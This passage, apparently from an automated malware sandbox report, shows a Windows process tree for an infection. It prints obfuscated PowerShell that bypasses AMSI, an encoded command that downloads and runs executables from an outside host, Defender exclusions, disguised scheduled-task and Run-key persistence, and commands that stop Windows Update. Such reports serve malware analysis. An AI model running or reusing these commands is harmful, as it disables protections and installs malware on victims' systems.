ntationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $OroBywbudQa.CreateType();}$izvUIrNwfupvx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+'d'+'ll')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](105)+''+[Char](122)+''+[Char](118)+''+[Char](85)+'I'+[Char](114)+''+[Char](78)+''+[Char](119)+''+'f'+'up'+'v'+''+[Char](120)+'');$KOpkidqlWxCJiQ=$izvUIrNwfupvx.GetMethod('K'+[Char](79)+''+[Char](112)+''+'k'+''+[Char](105)+'d'+[Char](113)+''+[Char](108)+''+'W'+''+[Char](120)+''+'C'+''+'J'+''+'i'+'Q',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'bl'+'i'+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HKVySrAmPFKzixcWrNG=cCHcvGcBwjJw @([String])([IntPtr]);$iDmLPtmTpgJVNbXqGhpWep=cCHcvGcBwjJw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vlZcStUqthY=$izvUIrNwfupvx.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'H'+'a'+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+'el32'+'.'+'d'+'l'+''+[Char](108)+'')));$urZgNcPWDsqXiD=$KOpkidqlWxCJiQ.Invoke($Null,@([Object]$vlZcStUqthY,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$voQWxtKgzmyPvDPQU=$KOpkidqlWxCJiQ.Invoke($Null,@([Object]$vlZcStUqthY,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$ZuJcAXS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($urZgNcPWDsqXiD,$HKVySrAmPFKzixcWrNG).Invoke(''+'a'+''+'m'+''+'s'+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$MhhgOuAugNEGsfvzE=$KOpkidqlWxCJiQ.Invoke($Null,@([Object]$ZuJcAXS,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+'Sc'+'a'+''+[Char](110)+'B'+'u'+''+'f'+'f'+'e'+''+'r'+'')));$AStBuuTLFG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voQWxtKgzmyPvDPQU,$iDmLPtmTpgJVNbXqGhpWep).Invoke($MhhgOuAugNEGsfvzE,[uint32]8,4,[ref]$AStBuuTLFG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$MhhgOuAugNEGsfvzE,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voQWxtKgzmyPvDPQU,$iDmLPtmTpgJVNbXqGhpWep).Invoke($MhhgOuAugNEGsfvzE,[uint32]8,0x20,[ref]$AStBuuTLFG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+'le'+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4784 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4316
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ELBOhPIWlews{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kIWBLDFAGDUGRv,[Parameter(Position=1)][Type]$PIYhhPeOUj)$epEMChBtpfr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'dul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+'e'+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+'ns'+'i'+'Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$epEMChBtpfr.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+'N'+'a'+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+','+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$kIWBLDFAGDUGRv).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+'t'+'i'+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'g'+'e'+''+[Char](100)+'');$epEMChBtpfr.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+'k'+'e','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+'de'+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+',Vi'+'r'+''+'t'+''+[Char](117)+''+[Char](97)+'l',$PIYhhPeOUj,$kIWBLDFAGDUGRv).SetImplementationFlags('R'+'u'+'nti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $epEMChBtpfr.CreateType();}$EDXdKtgPaumCj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+'3'+'2'+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'f'+[Char](101)+''+'E'+'D'+[Char](88)+'d'+'K'+''+[Char](116)+''+[Char](103)+''+'P'+''+'a'+''+[Char](117)+''+[Char](109)+''+[Char](67)+'j');$sxGtLhYxYRIURI=$EDXdKtgPaumCj.GetMethod(''+[Char](115)+'x'+[Char](71)+''+[Char](116)+''+[Char](76)+''+[Char](104)+''+[Char](89)+'x'+'Y'+''+[Char](82)+''+[Char](73)+'U'+[Char](82)+''+[Char](73)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JnFGXROVAWwjYzVLbyX=ELBOhPIWlews @([String])([IntPtr]);$MQZpOWkfZmaQdpNSNhRbzS=ELBOhPIWlews @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ohwtmKDRKss=$EDXdKtgPaumCj.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'n'+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$CLadmjeeQrScnU=$sxGtLhYxYRIURI.Invoke($Null,@([Object]$ohwtmKDRKss,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+'i'+'b'+'r'+[Char](97)+'r'+[Char](121)+'A')));$TqxPrrerpqxZyPueF=$sxGtLhYxYRIURI.Invoke($Null,@([Object]$ohwtmKDRKss,[Object]('Vi'+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$gaeubXs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CLadmjeeQrScnU,$JnFGXROVAWwjYzVLbyX).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$hXvdAbEbCqyckkYkA=$sxGtLhYxYRIURI.Invoke($Null,@([Object]$gaeubXs,[Object](''+'A'+'ms'+'i'+''+[Char](83)+''+'c'+'an'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$VQXeDIWYAU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TqxPrrerpqxZyPueF,$MQZpOWkfZmaQdpNSNhRbzS).Invoke($hXvdAbEbCqyckkYkA,[uint32]8,4,[ref]$VQXeDIWYAU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hXvdAbEbCqyckkYkA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TqxPrrerpqxZyPueF,$MQZpOWkfZmaQdpNSNhRbzS).Invoke($hXvdAbEbCqyckkYkA,[uint32]8,0x20,[ref]$VQXeDIWYAU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'ia'+[Char](108)+''+'e'+''+'r'+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4820
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:3796 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"3⤵
- Creates scheduled task(s)
PID:2732 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4304
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1344
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2364
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2176
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2456
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:1692
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 1406⤵
- Program crash
PID:2356
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4876 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:2472 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:2136
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:2836
-
-
C:\Windows\System32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:5088
-
-
C:\Windows\System32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:4924
-
-
C:\Windows\System32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f7⤵PID:4280
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f7⤵PID:1980
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f7⤵
- Modifies security service
PID:2156
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f7⤵PID:4420
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f7⤵PID:1988
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 2563⤵
- Program crash
PID:1220
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
